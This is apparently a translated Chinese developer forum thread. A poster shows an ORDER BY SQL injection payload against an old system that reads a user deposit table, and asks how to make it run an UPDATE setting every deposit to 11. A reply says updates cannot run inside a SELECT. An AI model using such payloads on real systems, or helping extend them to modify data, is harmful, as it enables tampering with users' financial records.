Found an orderBy-based sql injection vulnerability in an old system that is under maintenance, and prepare to verify it,
I will perform this sql injection first, it is ok
SELECT sysitem_item.item_id FROM sysitem_item `sysitem_item` ORDER BY (select
case
when
(1=1)
then
1
else
(
select deposit
from sysuser_user_deposit
)end)=1 ASC LIMIT 20 OFFSET 0But when I execute this sql with update statement, I get an error:
SELECT sysitem_item.item_id FROM sysitem_item `sysitem_item` ORDER BY (select
case
when
(1=1)
then
1
else
(
update
sysuser_user_deposit
set
deposit=11)end)=1 ASC LIMIT 20 OFFSET 0Error reporting
<code>#1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'update<br>
sysuser_user_deposit<br>
set<br>
deposit=11)end)=1 ASC LIMIT 20 OFFSET 0' at line 9</code>How should I let him perform update?
淡淡烟草味2017-05-18 10:49:26
When the main body is select, it cannot be updated, otherwise it cannot be executed.
I have tried this kind of injection in mybatis. When executing update in <select>, an error is reported directly and the injection cannot be done
